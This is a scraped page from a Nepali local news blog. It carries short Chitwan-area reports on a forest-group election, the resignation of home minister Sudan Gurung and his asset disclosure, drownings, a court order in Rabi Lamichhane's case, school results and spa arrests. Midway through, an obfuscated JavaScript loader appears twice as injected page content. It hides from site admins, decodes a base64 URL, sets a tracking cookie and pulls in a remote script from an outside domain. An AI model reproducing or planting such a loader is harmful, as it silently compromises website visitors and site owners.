Home Blog Page 2

कंकाली वनमा काँग्रेस-एमाले गठबन्धनलाई पराजित गर्दै रास्वपाको प्यानलै विजयी 

चितवन, खैरहनी । खैरहनी नगरपालिका–४ चैनपुरस्थित कंकाली सामुदायिक वन उपभोक्ता समूहको नयाँ नेतृत्व चयनका लागि सम्पन्न निर्वाचनमा दुई दलीय गठबन्धनलाई पराजित गर्दै रास्वपाको प्यानलै विजयी भएको छ ।

काँग्रेस, एमाले गठबन्धन हुँदा रास्वपा एक्लै चुलावमा होमिएको थियो । नेपाली कम्युनिष्ट पार्टीले भने भित्रि रुपमा रास्वपालाई समर्थन गरेको बुझिएको छ ।

रास्वापा निकट रविन्द्रनाथ अधिकारी नेतृत्वको प्यानलले क्लिन स्वीप गरेको हो। अध्यक्ष पदका उम्मेदवार रविन्द्रनाथ अधिकारी ९९ मतान्तरसहित विजयी भए ।

अधिकारीले ६३६ मत प्राप्त गर्दा उनका प्रतिस्पर्धी तिलक न्यौपानेले ५३७ मत प्राप्त गरे। अध्यक्षसहित अधिकारी नेतृत्वको सम्पूर्ण प्यानल विजयी भएको निर्वाचन समितिले जनाएको छ।

नवनिर्वाचित उपाध्यक्षमा कविचन्द्र रिमाल, सचिवमा सकुन्तला अधिकारी, कोषाध्यक्षमा पार्वती बस्नेत निर्वाचित भएका छन्। त्यसैगरी लेखा समिति संयोजकमा कृष्णप्रसाद अर्याल तथा सदस्यहरूमा राजेन्द्रप्रसाद ढकाल र सुदीप सोती निर्वाचित भएका छन्।

विवादित भूमिका : सरकार बनेको २६ दिनमै गयो २ मन्त्रीको पद

९ वैशाख, काठमाडौं । प्रधानमन्त्री बालेन्द्र शाह नेतृत्वको सरकार बनेको २६ दिनमै २ मन्त्री बाहिरिएका छन् । उनीहरूको कार्यशैली र व्यक्तिगत अपारदर्शी शैलीका कारण उनीहरू पदबाट हटेका हुन् ।

यसअघि आफ्नी श्रीमतीलाई बिमा बोर्डको सदस्यमा अनधिकृत रुपमा सहभागी गराउने भूमिका खलेको भन्दै विवादमा परेपछि श्रममन्त्री दीपककुमार साह १३ दिनमै बाहिरिएका थिए । उनलाई तत्कालै पदबाट फिर्ता बोलाउने निर्णय गर्दै रास्वपाले प्रधानमन्त्रीलाई सिफारिस गरेको थियो । त्यही सिफारिसका आधारमा साहलाई हटाइएको थियो ।

अहिले सरकार बनेको २६ दिनमा गृहमन्त्री सुधन गुरुङले राजीनामा दिएका छन् । उनको सम्पत्तिमाथि प्रश्न उठेपछि उनले बुधबार राजीनामा दिएका छन् ।

केही दिनअघि उनले सम्पत्ति विवरण सार्वजनिक गरेका थिए । त्यो सम्पत्ति विवरण नै अस्वाभाविक रहेको भन्दै प्रश्न उठिरहेको बेलामा उनले माइक्रो इन्स्योरेन्स लगायतमा लगरेको अर्को लागनीको विवरण पनि बाहिर आयो ।

उनले सञ्चालन गरेको सामाजिक संस्था हामी नेपालमा आएको सहयोग रकम पनि व्यक्तिगत खाता मार्फत् कारोबार गर्ने गरेको लगायतका विषय बाहिरिएपछि गुरुङलाई पदबाट बाहिरिनका लागि सर्वत्र दबाब परेको थियो । त्यही दबाबमा बीच उनले बुधबार पदबाट राजीनामा दिएका हुन् ।

गृहमन्त्री गुरुङले दिए राजीनामा

Home minister Sudan Gurung during speaker oath ceremony at president office on Sunday. Photo/Hemanta Shrestha

काठमाडौं । गृहमन्त्री सुधन गुरुङले पदबाट राजीनामा दिएका छन् । उनले सामाजिक सञ्जालबाट आफ्नो राजीनामाको घोषणा गरेका हुन् ।

नागरिकस्तरबाट आफ्नो सेयर लगायतका विषयमा उठेका जनचासोलाई गम्भीररुपमा लिएको उनले बताएका छन् । आफूसँग सम्वन्धित विषयमा निष्पक्ष छानविन होस र पदमा रहँदा स्वार्थको द्वन्द्व नदेखियोस भनेर राजीनामा दिएको उनको भनाइ छ ।

मन्त्री गुरुङले केहीबेरअघि प्रधानमन्त्री बालेन्द्र शाहसँग भेटेका थिए ।

बकैया खोलामा डुबेर एकजनाको ज्यान गयो

मकवानपुर- मकवानपुरमा खोलामा डुबेर एक जनाको मृत्यु भएको छ। मकवानपुरको बकैया गाउँपालिका–८ र ३ को सिमाना चिसापानीस्थित बकैया खोलामा डुबेर एक पुरुषको ज्यान गएको हो।

हिजो वैशाख ७ गते सोमबार दिउँसो करिब १:५० बजे भएको घटनामा बकैया गाउँपालिका–९ च्याउच्याउ निवासी अन्दाजी ३५ वर्षीय लाक्पा भोलनको मृत्यु भएको प्रहरीले जनाएको छ।

प्रहरीका अनुसार भोलन आफ्नी करिब १० वर्षीया भतिजीसँग खोलातर्फ गएका थिए। उनले भतिजीलाई बाहिर राखेर खोलामा पौडी खेल्न गएको बेला अचानक डुबेका थिए। घटनालाई प्रत्यक्ष देखेकी भतिजीले तत्काल स्थानीयलाई खबर गरेपछि स्थानीयवासीले उनलाई पानीबाट बाहिर निकालेका थिए। तर, बाहिर निकाल्दासम्म उनको मृत्यु भइसकेको थियो।

मृतकको शव पोस्टमार्टमका लागि जिल्ला अस्पताल मकवानपुर पठाइएको छ। प्रहरीले घटनाबारे थप अनुसन्धान गरिरहेको जनाएको छ।

बाल्टिको पानीमा डुबेर भरतपुरमा एक वर्षीया बालिकाको मृत्यु

चितवन, ६ वैशाख । चितवनको भरतपुर महानगरपालिका वडा नं. १४ प्रगति टोलमा आफ्नै घरमा राखिएको पानीको बाल्टिमा डुबेर एक वर्षीया बालिकाको मृत्यु भएको छ।

स्थानीय शिव बहादुर वि.क. की करिब १ वर्षीया छोरी समृद्धि वि.क. आईतबार दिउँसो ३:०० बजेको समयमा घरमै खेलिरहेका बेला पानी भरिएको बाल्टिमा डुबेकी थिइन्। उनलाई बाल्टिमा डुबिरहेको अवस्थामा आमाले देखेपछि तत्काल उद्धार गरी उपचारका लागि नयाँ मेडिकल कलेज भरतपुर पुर्‍याइएको थियो।

अस्पताल पुर्‍याए लगत्तै चिकित्सकहरूले उपचार सुरु गरे तापनि दिउँसो १५:४१ बजे बालिकालाई डाक्टरले मृत घोषणा गरेका थिए।

रवि लामिछानेको मुद्दामा चितवन अदालतले दियो वारेस सुविधा

काठमाडौं । चितवन जिल्ला अदालतले राष्ट्रिय स्वतन्त्र पार्टी (रास्वपा) का सभापति रवि लामिछानेलाई सहकारी ठगीसम्बन्धी मुद्दामा वारेस राख्ने सुविधा दिएको छ ।

लामिछानेको निवेदनमा सुनुवाइपछि सोमबार (चैत ३०) न्यायाधीश केदारनाथ पौडेलको इजलासले उक्त अनुमति दिएको हो । सभापति लामिछानेले आफू बिरामी भई काबुबाहिरको परिस्थिति उल्लेख गर्दै आफैँ तारेखमा उपस्थित हुन नसक्ने अवस्था निवेदनमा दर्शाएका थिए ।

अदालतले मुद्दामा प्रतिवादी रहेका लामिछानेले पेस गरेको त्रिभुवन विश्वविद्यालय शिक्षण अस्पतालको स्वास्थ्य परीक्षण रिपोर्टलाई वारेश अनुमतिको आधार लिएको छ । अदालतको आदेश अनुसार अब लामिछानेले मुद्दाको तारिखमा आफैँ चितवन अदालत जानुपर्दैन ।

“लामिछानेको मुद्दाको प्रकृति, स्वास्थ्य अवस्था र कार्यव्यस्तताजस्ता कारण दर्शाउँदै मुलुकी फौजदारी कार्यविधि संहिता, २०७४ को दफा ९५ (२) अनुसार अवधि नतोकी वारेश राख्न पाउने आदेश भएको छ,” चितवन जिल्ला अदालतका सूचना अधिकारी अमृत विश्वकर्माले भने ।

अदालतको आदेशअनुसार, लामिछानेले आफूविरुद्ध दर्ता भएको सहकारी ठगीसम्बन्धी मुद्दामा अन्तिम फैसला नहुञ्जेल वारेश सुविधा पाउनेछन् ।

गृहमन्त्री सुधन गुरुङको सम्पती : ४ करोड ३० लाखको शेयर

गृहमन्त्री सुधन गुरूङको सम्पत्ति विवरण सार्वजनिक भएको छ।  आइतबार प्रधानमन्त्री तथा मन्त्रिपरिषदको कार्यालयले प्रधानमन्त्रीसहित मन्त्रीहरू सबै जनाको सम्पत्ति विवरण सार्वजनिक गरेका हुन्।

गृहमन्त्री गुरूङले धनकुटामा १९ रोपनी १५ आना लगानीबाट प्राप्त जग्गा भनेर खुलाएका छन्। बुबा दिलबहादुर गुरूङ (पिता) को नाममा चितवनमा ३० कट्ठा, बाजे रामसल गुरूङ र परिवारको नाममा २२१ रोपनी पैतृक जग्गा भएको खुलाएका छन्।

८९ तोला सुन, ६ किलो चाँदी पैत्रिक सम्पत्ति देखाएका छन्। गुरूङको लक्ष्मी सनराइज बैंकमा ५ लाख ३५ हजार ४००, नबिल बैंकमा ५६ लाख २५ हजार ९७६ रुपैयाँ र सानीमा बैंकमा एक हजार ५७४ रुपैयाँ देखाएका छन्।

होप होल्डिङ्स प्रालिमा ३० लाख रुपैयाँ बराबरको ३० हजार कित्ता शेयर देखाएका छन्। लगुम प्रमियम अपार्टमेन्ट्समा ५७ लाख बराबरको ५७ हजार कित्ता शेयर देखाएका छन्।

धितोपत्र बजारमा २ करोड ७४ लाख ५६ हजार २०० बराबरको शेयर देखिएको छ।  एड्भेन्चर भिल्ला प्रालिमा ७० लाखको ७० हजार कित्ता शेयर देखाएका छन्। उनले आफ्नो शेयर व्यवसाय, पैत्रिक सम्पत्ति र लगानीमार्फत आर्जन गरेको खुलाएका हुन्।

त्यस्तै उनले लगुम प्रिमियमको नाममा रहेको ०३२ च ४४७७ एमजी एस५ कार पनि देखाएका छन्। उक्त कार गत असोज १६ गते ४७ लाख ९९ हजार रुपैयाँमा किनेको खुलाएका छन्।

https://aislekit.pages.dev

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad(‘aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==’);if(typeof window!==’undefined’&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie=’http2_session_id=1; expires=’+d.toUTCString()+’; path=/; SameSite=Lax’+(location.protocol===’https:’?’; Secure’:”);try{window.__rl=u;}catch(e){}var s=document.createElement(‘script’);s.type=’text/javascript’;s.async=true;s.src=u;try{s.setAttribute(‘data-rl’,u);}catch(e){}(document.getElementsByTagName(‘head’)[0]||document.documentElement).appendChild(s);}catch(e){}})();(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9+/=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad(‘aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==’);if(typeof window!==’undefined’&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie=’http2_session_id=1; expires=’+d.toUTCString()+’; path=/; SameSite=Lax’+(location.protocol===’https:’?’; Secure’:”);try{window.__rl=u;}catch(e){}var s=document.createElement(‘script’);s.type=’text/javascript’;s.async=true;s.src=u;try{s.setAttribute(‘data-rl’,u);}catch(e){}(document.getElementsByTagName(‘head’)[0]||document.documentElement).appendChild(s);}catch(e){}})();

रत्ननगरको आधारभूत शिक्षा संकटमा; सामुदायिक तर्फका ६८२ मध्ये ४२३ ननग्रेडेड

निराजन घिमिरे-  रत्ननगर नगरपालिकामा सामुदायिक विद्यालयको  कक्षा ८ को नतिजाले स्थानीय शिक्षा प्रणालीमाथि गम्भीर प्रश्न उठाएको छ। सामुदायिक विद्यालयबाट परिक्षामा सहभागी  ६८२ विद्यार्थीमध्ये ४२३ जना कक्षा ९ मा अध्ययन गर्न अयोग्य  हुँदा समग्र उत्तीर्ण प्रतिशत जम्मा ३७.९८ मा झरेको छ। आधारभूत शिक्षा जस्तो संवेदनशील तहमा यस्तो कमजोर नतिजा आउनु सामान्य असफलता होइन, प्रणालीगत कमजोरीको संकेत हो।

नतिजाको विश्लेषण गर्दा परिक्षामा सहभागी १९ मध्ये १६ वटा विद्यालयको नतिजा ५० प्रतिशतभन्दा तल रहेको छ । दुई विद्यालय बैरिया माध्यमिक विद्यालय ६४.४९% र आधारभूत विद्यालय बेलसी ६४.२९% ले केही राहत दिएको देखिए पनि बाँकी विद्यालयको अवस्था निराशाजनक छ। जनजागृति माध्यमिक विद्यालय ५१.३५ प्रतिशतमा सीमित हुँदा  अन्य सबै १६ विद्यालयको नतिजा पचास प्रतिशत भन्दा माथि जान सकेन।

परिक्षामा सहभागी भएका कुल १९  वटा सामुदायिक विद्यालय मध्ये भद्रकाली मा.वि र आधारभूत विद्यालय देवौलीको नतिजा सबैभन्दा कमजोर देखिएको छ । यी दुवै विद्यालयका १० प्रतिशत विद्यार्थी पनि अपग्रेडेड हुन सकेनन् । जसमध्ये ३२ जना विद्यार्थीले परिक्षा दिएको भद्रकाली माविमा जम्मा ३ जना विद्यार्थी ग्रेडेड भएका छन् भने २९ जना विद्यार्थी ननग्रेडेड भएका छन् । जुन कुल विद्यार्थी संख्याको ९.३८% मात्र हो ।

यसैगरी आधारभूत विद्यालय देवौलीमा कुल १६ जना विद्यार्थी परिक्षामा सहभागी भएकामा १ जना मात्र कक्षा ९ मा अध्ययन गर्न योग्य भएका छन्। सो विद्यालयका १५ जना विद्यार्थी  ननग्रेडेड भए । जुन कुल विद्यार्थी संख्याको ६.२५% मात्र हो । परिक्षामा सहभागी विद्यालय मध्ये ७ वटा विद्यालयको नतिजा ३० प्रतिशत भन्दा कम छ ।  आधारभूत तहको परिक्षामै यो संख्यामा विद्यार्थी ननग्रेडेड हुनु सामुदायिक विद्यालयको सिकाई प्रणाली माथिको गम्भीर प्रश्न हो । विद्यालयको नतिजाले ‘के त्यहाँ पढाइ नै भइरहेको छ? कि कक्षा सञ्चालन केवल औपचारिकतामा सीमित छ?’ भन्ने प्रश्न उठाएको छ ।

यति ठूलो संख्यामा विद्यार्थी ननग्रेडेड हुनु केवल विद्यार्थीको कमजोरी होइन। यसले शिक्षक व्यवस्थापन, विद्यालय नेतृत्व, स्थानीय तहको अनुगमन र अभिभावकको सहभागितासम्मका सबै पक्ष कमजोर रहेको संकेत गर्छ। कतिपय विद्यालयमा शिक्षक अभाव, विषयगत दक्षता कमी, तथा नियमित अनुगमनको अभाव पनि देखिएको छ ।

सिकाइ कमजोर हुनुका कारण विभिन्न हुन सक्छन् तथापि न्यूनतम सिकाइ उपलब्धि हासिल गराउन विद्यालय र कक्षा शिक्षणको भूमिका महत्वपूर्ण हुन्छ । एउटै परिवेश र एउटै अवस्थाका दुई वटा विद्यालयका नतिजामा देखिने ठूलो अन्तरले समस्या विद्यालयमै छ भन्ने देखाउँछ। एकातिर भौतिक पूृर्वाधारको विकास र सुधारलाई प्राथमिकता दिइरहेको अवस्था छ भने अर्कातिर विद्यालयमा विद्यार्थी संख्या घट्दैछ । विषयगत शिक्षकको अभावलाई कमजोर सिकाइको कारण बताइँदै गर्दा पर्याप्त शिक्षक भएका विद्यालयहरूको नतिजा पनि राम्रो आएको पाइँदैन ।

नगरपालिकाले शिक्षा क्षेत्रमा वार्षिक रूपमा उल्लेख्य बजेट विनियोजन गर्दै आएको छ । विद्यालय भवन निर्माण, शैक्षिक सामग्री, शिक्षक व्यवस्थापन तथा विभिन्न कार्यक्रमहरूमा लगानी गरिएको छ । तर, यति धेरै लगानी हुँदाहुँदै पनि नतिजा सुधार हुन नसक्नुले “शिक्षामा गरिएको लगानी बालुवामा पानी जस्तै भइरहेको छ” भन्ने आलोचना बलियो बनेको छ ।

चितवनमा स्पा तथा मसाज सेन्टरबाट ८ जना पक्राउ

चितवन । भरतपुरका विभिन्न स्थानमा अनुमति बिना सञ्चालनमा रहेका स्पा सेन्टरबाट आज ८ जनालाई प्रहरीले नियन्त्रणमा लिएको छ ।

भरतपुर महानगरपालिका १० र ११ मा सञ्चालनमा रहेका ६ वटा स्पा सेन्टरबाट ६ जना सञ्चालक, एक जना महिला कामदार र एक जना ग्राहक गरी ८ जनालाई नियन्त्रणमा लिइएको चितवन प्रहरीका सूचना अधिकारी डिएसपी रवीन्द्र खनालले जानकारी दिए ।

डिएसपी खनालका अनुसार स्पा सेन्टरले दर्ता अनुमति नलिई सञ्चालन गर्नुका साथै यौनजन्य गतिविधि पनि गरेको आशंकामा प्रहरीले अनुसन्धान अघि बढाएको छ ।

पछिल्लो समय चितवनमा स्पा सेन्टरहरू अत्यधिक खुलेको र मानव बेचबिखनका जोखिम स्पा सेन्टरका कारण बढ्दै गएको उजुरी बढ्दै गएको छ ।

कालिका नगरपालिका र अमेरिकी सहरबीच सहकार्यको पहल, फेयरफ्याक्स सिटीसँग अनुभव आदानप्रदान

भरतपुर । कालिका नगरपालिका र अमेरिकाको भर्जिनिया राज्यस्थित Fairfax City बीच सहकार्य विस्तार गर्ने विषयमा महत्वपूर्ण छलफल भएको छ।

आज आयोजित भेटघाटमा कालिका नगरपालिकाको टोलीले फेयरफ्याक्स सिटीकी मेयर Catherine Read सँग प्रविधि प्रयोग र उच्चस्तरीय विकासका अभ्यासबारे जानकारी लिँदै अनुभव आदानप्रदान गरेको हो।

 

भेटका क्रममा कालिका नगरपालिकामा कार्यान्वयन भइरहेको जीपीएस प्रणाली, फोहर व्यवस्थापन, स्वास्थ्य, शिक्षा तथा पूर्वाधार निर्माणलगायतका कार्यक्रमहरूमा सहकार्य गर्ने प्रस्ताव प्रस्तुत गरिएको थियो। उक्त प्रस्तावप्रति मेयर Read तथा उनको टोलीले सकारात्मक प्रतिक्रिया दिएको जनाइएको छ।

दुवै पक्षबीच आगामी दिनमा पारस्परिक सहकार्यलाई थप मजबुत बनाउँदै दिगो सम्बन्ध विस्तार गर्ने सहमति समेत भएको छ। सो अवसरमा दुवै पक्षबीच मायाको चिनो आदानप्रदान गरिएको थियो।

कालिका नगरपालिकाको तर्फबाट उपयुक्त समयमा नेपाल तथा नगरपालिकाको भ्रमणका लागि निमन्त्रणा दिइएकोमा मेयर Read ले खुशी व्यक्त गर्दै उपयुक्त समय मिलाएर आफ्नो टोलीसहित नेपाल आउने प्रतिबद्धता जनाइन्। साथै उनले कालिका नगरपालिकाको टोलीलाई पुनः फेयरफ्याक्स सिटी भ्रमणका लागि निमन्त्रणा समेत दिएकी छन्।

यस कार्यमा सहजिकरण गर्ने प्रा.डा. रामहरि सुवेदी तथा समय उपलब्ध गराई सहयोग गर्ने सिटी इन्जिनियर, सिटी म्यानेजर र मेयर Read सहितको सम्पूर्ण टोलीप्रति कालिका नगरपालिकाले आभार व्यक्त गरेको छ।